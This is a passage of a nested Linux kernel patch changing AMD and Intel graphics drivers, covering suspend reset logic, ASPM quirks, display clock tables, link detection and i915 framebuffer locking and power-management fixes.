+ void amdgpu_acpi_get_backlight_caps(struct amdgpu_dm_backlight_caps *caps);
++bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev);
+ void amdgpu_acpi_detect(void);
+ #else
+ static inline int amdgpu_acpi_init(struct amdgpu_device *adev) { return 0; }
+ static inline void amdgpu_acpi_fini(struct amdgpu_device *adev) { }
++static inline bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev) { return false; }
+ static inline void amdgpu_acpi_detect(void) { }
+ static inline bool amdgpu_acpi_is_power_shift_control_supported(void) { return false; }
+ static inline int amdgpu_acpi_power_shift_control(struct amdgpu_device *adev,
+@@ -1401,11 +1404,9 @@ static inline int amdgpu_acpi_smart_shift_update(struct drm_device *dev,
+ 
+ #if defined(CONFIG_ACPI) && defined(CONFIG_SUSPEND)
+ bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev);
+-bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev);
+ bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev);
+ #else
+ static inline bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev) { return false; }
+-static inline bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev) { return false; }
+ static inline bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev) { return false; }
+ #endif
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index 57b5e11446c65..f873692071032 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -971,6 +971,29 @@ static bool amdgpu_atcs_pci_probe_handle(struct pci_dev *pdev)
+ 	return true;
+ }
+ 
++
++/**
++ * amdgpu_acpi_should_gpu_reset
++ *
++ * @adev: amdgpu_device_pointer
++ *
++ * returns true if should reset GPU, false if not
++ */
++bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
++{
++	if (adev->flags & AMD_IS_APU)
++		return false;
++
++	if (amdgpu_sriov_vf(adev))
++		return false;
++
++#if IS_ENABLED(CONFIG_SUSPEND)
++	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
++#else
++	return true;
++#endif
++}
++
+ /*
+  * amdgpu_acpi_detect - detect ACPI ATIF/ATCS methods
+  *
+@@ -1042,24 +1065,6 @@ bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev)
+ 		(pm_suspend_target_state == PM_SUSPEND_MEM);
+ }
+ 
+-/**
+- * amdgpu_acpi_should_gpu_reset
+- *
+- * @adev: amdgpu_device_pointer
+- *
+- * returns true if should reset GPU, false if not
+- */
+-bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
+-{
+-	if (adev->flags & AMD_IS_APU)
+-		return false;
+-
+-	if (amdgpu_sriov_vf(adev))
+-		return false;
+-
+-	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
+-}
+-
+ /**
+  * amdgpu_acpi_is_s0ix_active
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index d8e79de839d65..d5e14a3aa05dd 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -79,6 +79,10 @@
+ 
+ #include <drm/drm_drv.h>
+ 
++#if IS_ENABLED(CONFIG_X86)
++#include <asm/intel-family.h>
++#endif
++
+ MODULE_FIRMWARE("amdgpu/vega10_gpu_info.bin");
+ MODULE_FIRMWARE("amdgpu/vega12_gpu_info.bin");
+ MODULE_FIRMWARE("amdgpu/raven_gpu_info.bin");
+@@ -1354,6 +1358,17 @@ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev)
+ 	return pcie_aspm_enabled(adev->pdev);
+ }
+ 
++bool amdgpu_device_aspm_support_quirk(void)
++{
++#if IS_ENABLED(CONFIG_X86)
++	struct cpuinfo_x86 *c = &cpu_data(0);
++
++	return !(c->x86 == 6 && c->x86_model == INTEL_FAM6_ALDERLAKE);
++#else
++	return true;
++#endif
++}
++
+ /* if we get transitioned to only one device, take VGA back */
+ /**
+  * amdgpu_device_vga_set_decode - enable/disable vga decode
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 7f598977d6942..d9e8579e23ab7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2457,7 +2457,10 @@ static int amdgpu_pmops_freeze(struct device *dev)
+ 	adev->in_s4 = false;
+ 	if (r)
+ 		return r;
+-	return amdgpu_asic_reset(adev);
++
++	if (amdgpu_acpi_should_gpu_reset(adev))
++		return amdgpu_asic_reset(adev);
++	return 0;
+ }
+ 
+ static int amdgpu_pmops_thaw(struct device *dev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 25a68d8888e0d..5d4649b8bfd33 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1315,7 +1315,7 @@ void amdgpu_bo_release_notify(struct ttm_buffer_object *bo)
+ 
+ 	if (!bo->resource || bo->resource->mem_type != TTM_PL_VRAM ||
+ 	    !(abo->flags & AMDGPU_GEM_CREATE_VRAM_WIPE_ON_RELEASE) ||
+-	    adev->in_suspend || adev->shutdown)
++	    adev->in_suspend || drm_dev_is_unplugged(adev_to_drm(adev)))
+ 		return;
+ 
+ 	if (WARN_ON_ONCE(!dma_resv_trylock(bo->base.resv)))
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+index 4b0d563c6522c..4ef1fa4603c8e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+@@ -382,11 +382,6 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		if (def != data)
+ 			WREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regBIF1_PCIE_MST_CTRL_3), data);
+ 		break;
+-	case IP_VERSION(7, 5, 1):
+-		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
+-		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
+-		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
+-		fallthrough;
+ 	default:
+ 		def = data = RREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regPCIE_CONFIG_CNTL));
+ 		data = REG_SET_FIELD(data, PCIE_CONFIG_CNTL,
+@@ -399,6 +394,15 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		break;
+ 	}
+ 
++	switch (adev->ip_versions[NBIO_HWIP][0]) {
++	case IP_VERSION(7, 3, 0):
++	case IP_VERSION(7, 5, 1):
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
++		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
++		break;
++	}
++
+ 	if (amdgpu_sriov_vf(adev))
+ 		adev->rmmio_remap.reg_offset = SOC15_REG_OFFSET(NBIO, 0,
+ 			regBIF_BX_PF0_HDP_MEM_COHERENCY_FLUSH_CNTL) << 2;
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index df3388e8dec00..877989278290a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -527,7 +527,7 @@ static void nv_pcie_gen3_enable(struct amdgpu_device *adev)
+ 
+ static void nv_program_aspm(struct amdgpu_device *adev)
+ {
+-	if (!amdgpu_device_should_use_aspm(adev))
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
+ 		return;
+ 
+ 	if (!(adev->flags & AMD_IS_APU) &&
+diff --git a/drivers/gpu/drm/amd/amdgpu/vi.c b/drivers/gpu/drm/amd/amdgpu/vi.c
+index 12ef782eb4785..ceab8783575ca 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vi.c
++++ b/drivers/gpu/drm/amd/amdgpu/vi.c
+@@ -81,10 +81,6 @@
+ #include "mxgpu_vi.h"
+ #include "amdgpu_dm.h"
+ 
+-#if IS_ENABLED(CONFIG_X86)
+-#include <asm/intel-family.h>
+-#endif
+-
+ #define ixPCIE_LC_L1_PM_SUBSTATE	0x100100C6
+ #define PCIE_LC_L1_PM_SUBSTATE__LC_L1_SUBSTATES_OVERRIDE_EN_MASK	0x00000001L
+ #define PCIE_LC_L1_PM_SUBSTATE__LC_PCI_PM_L1_2_OVERRIDE_MASK	0x00000002L
+@@ -1138,24 +1134,13 @@ static void vi_enable_aspm(struct amdgpu_device *adev)
+ 		WREG32_PCIE(ixPCIE_LC_CNTL, data);
+ }
+ 
+-static bool aspm_support_quirk_check(void)
+-{
+-#if IS_ENABLED(CONFIG_X86)
+-	struct cpuinfo_x86 *c = &cpu_data(0);
+-
+-	return !(c->x86 == 6 && c->x86_model == INTEL_FAM6_ALDERLAKE);
+-#else
+-	return true;
+-#endif
+-}
+-
+ static void vi_program_aspm(struct amdgpu_device *adev)
+ {
+ 	u32 data, data1, orig;
+ 	bool bL1SS = false;
+ 	bool bClkReqSupport = true;
+ 
+-	if (!amdgpu_device_should_use_aspm(adev) || !aspm_support_quirk_check())
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
+ 		return;
+ 
+ 	if (adev->flags & AMD_IS_APU ||
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
+index 24715ca2fa944..01383aac6b419 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
+@@ -529,6 +529,19 @@ static struct clk_bw_params vg_bw_params = {
+ 
+ };
+ 
++static uint32_t find_max_clk_value(const uint32_t clocks[], uint32_t num_clocks)
++{
++	uint32_t max = 0;
++	int i;
++
++	for (i = 0; i < num_clocks; ++i) {
++		if (clocks[i] > max)
++			max = clocks[i];
++	}
++
++	return max;
++}
++
+ static unsigned int find_dcfclk_for_voltage(const struct vg_dpm_clocks *clock_table,
+ 		unsigned int voltage)
+ {
+@@ -572,12 +585,16 @@ static void vg_clk_mgr_helper_populate_bw_params(
+ 
+ 	bw_params->clk_table.num_entries = j + 1;
+ 
+-	for (i = 0; i < bw_params->clk_table.num_entries; i++, j--) {
++	for (i = 0; i < bw_params->clk_table.num_entries - 1; i++, j--) {
+ 		bw_params->clk_table.entries[i].fclk_mhz = clock_table->DfPstateTable[j].fclk;
+ 		bw_params->clk_table.entries[i].memclk_mhz = clock_table->DfPstateTable[j].memclk;
+ 		bw_params->clk_table.entries[i].voltage = clock_table->DfPstateTable[j].voltage;
+ 		bw_params->clk_table.entries[i].dcfclk_mhz = find_dcfclk_for_voltage(clock_table, clock_table->DfPstateTable[j].voltage);
+ 	}
++	bw_params->clk_table.entries[i].fclk_mhz = clock_table->DfPstateTable[j].fclk;
++	bw_params->clk_table.entries[i].memclk_mhz = clock_table->DfPstateTable[j].memclk;
++	bw_params->clk_table.entries[i].voltage = clock_table->DfPstateTable[j].voltage;
++	bw_params->clk_table.entries[i].dcfclk_mhz = find_max_clk_value(clock_table->DcfClocks, VG_NUM_DCFCLK_DPM_LEVELS);
+ 
+ 	bw_params->vram_type = bios_info->memory_type;
+ 	bw_params->num_channels = bios_info->ma_channel_number;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 754fc86341494..54656fcaa6464 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1016,6 +1016,7 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 	struct dc_sink *prev_sink = NULL;
+ 	struct dpcd_caps prev_dpcd_caps;
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
++	enum dc_connection_type pre_connection_type = link->type;
+ 	const uint32_t post_oui_delay = 30; // 30ms
+ 
+ 	DC_LOGGER_INIT(link->ctx->logger);
+@@ -1118,6 +1119,8 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 			}
+ 
+ 			if (!detect_dp(link, &sink_caps, reason)) {
++				link->type = pre_connection_type;
++
+ 				if (prev_sink)
+ 					dc_sink_release(prev_sink);
+ 				return false;
+@@ -1349,6 +1352,8 @@ bool dc_link_detect(struct dc_link *link, enum dc_detect_reason reason)
+ 	bool is_delegated_to_mst_top_mgr = false;
+ 	enum dc_connection_type pre_link_type = link->type;
+ 
++	DC_LOGGER_INIT(link->ctx->logger);
++
+ 	is_local_sink_detect_success = detect_link_and_local_sink(link, reason);
+ 
+ 	if (is_local_sink_detect_success && link->local_sink)
+@@ -1359,6 +1364,10 @@ bool dc_link_detect(struct dc_link *link, enum dc_detect_reason reason)
+ 			link->dpcd_caps.is_mst_capable)
+ 		is_delegated_to_mst_top_mgr = discover_dp_mst_topology(link, reason);
+ 
++	DC_LOG_DC("%s: link_index=%d is_local_sink_detect_success=%d pre_link_type=%d link_type=%d\n", __func__,
++		 link->link_index, is_local_sink_detect_success, pre_link_type, link->type);
++
++
+ 	if (is_local_sink_detect_success &&
+ 			pre_link_type == dc_connection_mst_branch &&
+ 			link->type != dc_connection_mst_branch)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index e4472c6be6c32..3fb4bcc343531 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -271,8 +271,7 @@ static void dccg32_set_dpstreamclk(
+ 	dccg32_set_dtbclk_p_src(dccg, src, otg_inst);
+ 
+ 	/* enabled to select one of the DTBCLKs for pipe */
+-	switch (otg_inst)
+-	{
++	switch (dp_hpo_inst) {
+ 	case 0:
+ 		REG_UPDATE_2(DPSTREAMCLK_CNTL,
+ 			     DPSTREAMCLK0_EN,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index b8767be1e4c55..30d15a94f720d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -1178,13 +1178,13 @@ unsigned int dcn32_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsign
+ 	if (is_dp_128b_132b_signal(pipe_ctx)) {
+ 		*k1_div = PIXEL_RATE_DIV_BY_1;
+ 		*k2_div = PIXEL_RATE_DIV_BY_1;
+-	} else if (dc_is_hdmi_tmds_signal(pipe_ctx->stream->signal) || dc_is_dvi_signal(pipe_ctx->stream->signal)) {
++	} else if (dc_is_hdmi_tmds_signal(stream->signal) || dc_is_dvi_signal(stream->signal)) {
+ 		*k1_div = PIXEL_RATE_DIV_BY_1;
+ 		if (stream->timing.pixel_encoding == PIXEL_ENCODING_YCBCR420)
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+ 		else
+ 			*k2_div = PIXEL_RATE_DIV_BY_4;
+-	} else if (dc_is_dp_signal(pipe_ctx->stream->signal) || dc_is_virtual_signal(pipe_ctx->stream->signal)) {
++	} else if (dc_is_dp_signal(stream->signal)) {
+ 		if (two_pix_per_container) {
+ 			*k1_div = PIXEL_RATE_DIV_BY_1;
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 252356a8160fa..6187aba1362b8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2186,6 +2186,7 @@ static bool dcn32_resource_construct(
+ 	dc->caps.edp_dsc_support = true;
+ 	dc->caps.extended_aux_timeout_support = true;
+ 	dc->caps.dmcub_support = true;
++	dc->caps.seamless_odm = true;
+ 
+ 	/* Color pipeline capabilities */
+ 	dc->caps.color.dpp.dcn_arch = 1;
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index a98efef0ba0e0..1b74a913f1b8f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -659,8 +659,8 @@ static int lt8912_parse_dt(struct lt8912 *lt)
+ 
+ 	lt->hdmi_port = of_drm_find_bridge(port_node);
+ 	if (!lt->hdmi_port) {
+-		dev_err(lt->dev, "%s: Failed to get hdmi port\n", __func__);
+-		ret = -ENODEV;
++		ret = -EPROBE_DEFER;
++		dev_err_probe(lt->dev, ret, "%s: Failed to get hdmi port\n", __func__);
+ 		goto err_free_host_node;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_crtc.c b/drivers/gpu/drm/i915/display/intel_crtc.c
+index 037fc140b585c..098acef59c10f 100644
+--- a/drivers/gpu/drm/i915/display/intel_crtc.c
++++ b/drivers/gpu/drm/i915/display/intel_crtc.c
+@@ -682,6 +682,14 @@ void intel_pipe_update_end(struct intel_crtc_state *new_crtc_state)
+ 	 */
+ 	intel_vrr_send_push(new_crtc_state);
+ 
++	/*
++	 * Seamless M/N update may need to update frame timings.
++	 *
++	 * FIXME Should be synchronized with the start of vblank somehow...
++	 */
++	if (new_crtc_state->seamless_m_n && intel_crtc_needs_fastset(new_crtc_state))
++		intel_crtc_update_active_timings(new_crtc_state);
++
+ 	local_irq_enable();
+ 
+ 	if (intel_vgpu_active(dev_priv))
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index dedbdb175f8b4..8b6994853f6f8 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5195,6 +5195,7 @@ intel_crtc_prepare_cleared_state(struct intel_atomic_state *state,
+ 	 * only fields that are know to not cause problems are preserved. */
+ 
+ 	saved_state->uapi = crtc_state->uapi;
++	saved_state->inherited = crtc_state->inherited;
+ 	saved_state->scaler_state = crtc_state->scaler_state;
+ 	saved_state->shared_dpll = crtc_state->shared_dpll;
+ 	saved_state->dpll_hw_state = crtc_state->dpll_hw_state;
+diff --git a/drivers/gpu/drm/i915/display/intel_fbdev.c b/drivers/gpu/drm/i915/display/intel_fbdev.c
+index 17e8bf2ac0e51..3a708bd73a000 100644
+--- a/drivers/gpu/drm/i915/display/intel_fbdev.c
++++ b/drivers/gpu/drm/i915/display/intel_fbdev.c
+@@ -210,6 +210,7 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 	bool prealloc = false;
+ 	void __iomem *vaddr;
+ 	struct drm_i915_gem_object *obj;
++	struct i915_gem_ww_ctx ww;
+ 	int ret;
+ 
+ 	mutex_lock(&ifbdev->hpd_lock);
+@@ -290,13 +291,24 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 		info->fix.smem_len = vma->size;
+ 	}
+ 
+-	vaddr = i915_vma_pin_iomap(vma);
+-	if (IS_ERR(vaddr)) {
+-		drm_err(&dev_priv->drm,
+-			"Failed to remap framebuffer into virtual memory (%pe)\n", vaddr);
+-		ret = PTR_ERR(vaddr);
+-		goto out_unpin;
++	for_i915_gem_ww(&ww, ret, false) {
++		ret = i915_gem_object_lock(vma->obj, &ww);
++
++		if (ret)
++			continue;
++
++		vaddr = i915_vma_pin_iomap(vma);
++		if (IS_ERR(vaddr)) {
++			drm_err(&dev_priv->drm,
++				"Failed to remap framebuffer into virtual memory (%pe)\n", vaddr);
++			ret = PTR_ERR(vaddr);
++			continue;
++		}
+ 	}
++
++	if (ret)
++		goto out_unpin;
++
+ 	info->screen_base = vaddr;
+ 	info->screen_size = vma->size;
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt.c b/drivers/gpu/drm/i915/gt/intel_gt.c
+index 9c18b5f2e7892..7868da20d5ea3 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt.c
+@@ -745,12 +745,12 @@ int intel_gt_init(struct intel_gt *gt)
+ 	if (err)
+ 		goto err_gt;
+ 
+-	intel_uc_init_late(&gt->uc);
+-
+ 	err = i915_inject_probe_error(gt->i915, -EIO);
+ 	if (err)
+ 		goto err_gt;
+ 
++	intel_uc_init_late(&gt->uc);
++
+ 	intel_migrate_init(&gt->migrate, gt);
+ 
+ 	intel_pxp_init(&gt->pxp);
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_pm.c b/drivers/gpu/drm/i915/gt/intel_gt_pm.c
+index 16db85fab0b19..3fbf70a587474 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_pm.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_pm.c
+@@ -20,31 +20,10 @@
+ #include "intel_rc6.h"
+ #include "intel_rps.h"
+ #include "intel_wakeref.h"
+-#include "intel_pcode.h"
+ #include "pxp/intel_pxp_pm.h"
+ 
+ #define I915_GT_SUSPEND_IDLE_TIMEOUT (HZ / 2)
+ 
+-static void mtl_media_busy(struct intel_gt *gt)
+-{
+-	/* Wa_14017073508: mtl */
+-	if (IS_MTL_GRAPHICS_STEP(gt->i915, P, STEP_A0, STEP_B0) &&
+-	    gt->type == GT_MEDIA)
+-		snb_pcode_write_p(gt->uncore, PCODE_MBOX_GT_STATE,
+-				  PCODE_MBOX_GT_STATE_MEDIA_BUSY,
+-				  PCODE_MBOX_GT_STATE_DOMAIN_MEDIA, 0);
+-}
+-
+-static void mtl_media_idle(struct intel_gt *gt)
+-{
+-	/* Wa_14017073508: mtl */
+-	if (IS_MTL_GRAPHICS_STEP(gt->i915, P, STEP_A0, STEP_B0) &&
+-	    gt->type == GT_MEDIA)
+-		snb_pcode_write_p(gt->uncore, PCODE_MBOX_GT_STATE,
+-				  PCODE_MBOX_GT_STATE_MEDIA_NOT_BUSY,
+-				  PCODE_MBOX_GT_STATE_DOMAIN_MEDIA, 0);
+-}
+-
+ static void user_forcewake(struct intel_gt *gt, bool suspend)
+ {
+ 	int count = atomic_read(&gt->user_wakeref);
+@@ -92,9 +71,6 @@ static int __gt_unpark(struct intel_wakeref *wf)
+ 
+ 	GT_TRACE(gt, "\n");
+ 
+-	/* Wa_14017073508: mtl */
+-	mtl_media_busy(gt);
+-
+ 	/*
+ 	 * It seems that the DMC likes to transition between the DC states a lot
+ 	 * when there are no connected displays (no active power domains) during
+@@ -144,9 +120,6 @@ static int __gt_park(struct intel_wakeref *wf)
+ 	GEM_BUG_ON(!wakeref);
+ 	intel_display_power_put_async(i915, POWER_DOMAIN_GT_IRQ, wakeref);
+ 
+-	/* Wa_14017073508: mtl */
+-	mtl_media_idle(gt);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_pm_debugfs.c b/drivers/gpu/drm/i915/gt/intel_gt_pm_debugfs.c
+index 83df4cd5e06cb..80dbbef86b1db 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_pm_debugfs.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_pm_debugfs.c
+@@ -580,7 +580,7 @@ static bool perf_limit_reasons_eval(void *data)
+ }
+ 
+ DEFINE_SIMPLE_ATTRIBUTE(perf_limit_reasons_fops, perf_limit_reasons_get,
+-			perf_limit_reasons_clear, "%llu\n");
++			perf_limit_reasons_clear, "0x%llx\n");
+ 
+ void intel_gt_pm_debugfs_register(struct intel_gt *gt, struct dentry *root)
+ {
+diff --git a/drivers/gpu/drm/i915/gt/intel_rc6.c b/drivers/gpu/drm/i915/gt/intel_rc6.c
+index 2ee4051e4d961..6184fcc169877 100644
+--- a/drivers/gpu/drm/i915/gt/intel_rc6.c
++++ b/drivers/gpu/drm/i915/gt/intel_rc6.c
+@@ -486,6 +486,7 @@ static bool bxt_check_bios_rc6_setup(struct intel_rc6 *rc6)
+ static bool rc6_supported(struct intel_rc6 *rc6)
+ {
+ 	struct drm_i915_private *i915 = rc6_to_i915(rc6);
++	struct intel_gt *gt = rc6_to_gt(rc6);
+ 
+ 	if (!HAS_RC6(i915))
+ 		return false;
+@@ -502,6 +503,13 @@ static bool rc6_supported(struct intel_rc6 *rc6)
+ 		return false;
+ 	}
+ 
++	if (IS_MTL_MEDIA_STEP(gt->i915, STEP_A0, STEP_B0) &&
++	    gt->type == GT_MEDIA) {
++		drm_notice(&i915->drm,
++			   "Media RC6 disabled on A step\n");
++		return false;
++	}
++
+ 	return true;
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+index 1c1b85073b4bd..710999d7189ee 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+@@ -1506,7 +1506,7 @@ int intel_guc_capture_print_engine_node(struct drm_i915_error_state_buf *ebuf,
+ 
+ 	if (!ebuf || !ee)
+ 		return -EINVAL;
+-	cap = ee->capture;
++	cap = ee->guc_capture;
+ 	if (!cap || !ee->engine)
+ 		return -ENODEV;
+ 
+@@ -1571,13 +1571,34 @@ int intel_guc_capture_print_engine_node(struct drm_i915_error_state_buf *ebuf,
+ 
+ #endif //CONFIG_DRM_I915_CAPTURE_ERROR
+ 
++static void guc_capture_find_ecode(struct intel_engine_coredump *ee)
++{
++	struct gcap_reg_list_info *reginfo;
++	struct guc_mmio_reg *regs;
++	i915_reg_t reg_ipehr = RING_IPEHR(0);
++	i915_reg_t reg_instdone = RING_INSTDONE(0);
++	int i;
++
++	if (!ee->guc_capture_node)
++		return;
++
++	reginfo = ee->guc_capture_node->reginfo + GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE;
++	regs = reginfo->regs;
++	for (i = 0; i < reginfo->num_regs; i++) {
++		if (regs[i].offset == reg_ipehr.reg)
++			ee->ipehr = regs[i].value;
++		else if (regs[i].offset == reg_instdone.reg)
++			ee->instdone.instdone = regs[i].value;
++	}
++}
++
+ void intel_guc_capture_free_node(struct intel_engine_coredump *ee)
+ {
+ 	if (!ee || !ee->guc_capture_node)
+ 		return;
+ 
+-	guc_capture_add_node_to_cachelist(ee->capture, ee->guc_capture_node);
+-	ee->capture = NULL;
++	guc_capture_add_node_to_cachelist(ee->guc_capture, ee->guc_capture_node);
++	ee->guc_capture = NULL;
+ 	ee->guc_capture_node = NULL;
+ }
+ 
+@@ -1611,7 +1632,8 @@ void intel_guc_capture_get_matching_node(struct intel_gt *gt,
+ 		    (ce->lrc.lrca & CTX_GTT_ADDRESS_MASK)) {
+ 			list_del(&n->link);
+ 			ee->guc_capture_node = n;
+-			ee->capture = guc->capture;
++			ee->guc_capture = guc->capture;
++			guc_capture_find_ecode(ee);
+ 			return;
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_rc.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_rc.c
+index b5855091cf6a9..8f8dd05835c5a 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_rc.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_rc.c
+@@ -11,20 +11,9 @@
+ 
+ static bool __guc_rc_supported(struct intel_guc *guc)
+ {
+-	struct intel_gt *gt = guc_to_gt(guc);
+-
+-	/*
+-	 * Wa_14017073508: mtl
+-	 * Do not enable gucrc to avoid additional interrupts which
+-	 * may disrupt pcode wa.
+-	 */
+-	if (IS_MTL_GRAPHICS_STEP(gt->i915, P, STEP_A0, STEP_B0) &&
+-	    gt->type == GT_MEDIA)
+-		return false;
+-
+ 	/* GuC RC is unavailable for pre-Gen12 */
+ 	return guc->submission_supported &&
+-		GRAPHICS_VER(gt->i915) >= 12;
++		GRAPHICS_VER(guc_to_gt(guc)->i915) >= 12;
+ }
+ 
+ static bool __guc_rc_selected(struct intel_guc *guc)
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index a9fea115f2d26..8ef93889061a6 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -92,8 +92,7 @@ static void debug_active_init(struct i915_active *ref)
+ static void debug_active_activate(struct i915_active *ref)
+ {
+ 	lockdep_assert_held(&ref->tree_lock);
+-	if (!atomic_read(&ref->count)) /* before the first inc */
+-		debug_object_activate(ref, &active_debug_desc);
++	debug_object_activate(ref, &active_debug_desc);
+ }
+ 
+ static void debug_active_deactivate(struct i915_active *ref)
+diff --git a/drivers/gpu/drm/i915/i915_gpu_error.h b/drivers/gpu/drm/i915/i915_gpu_error.h
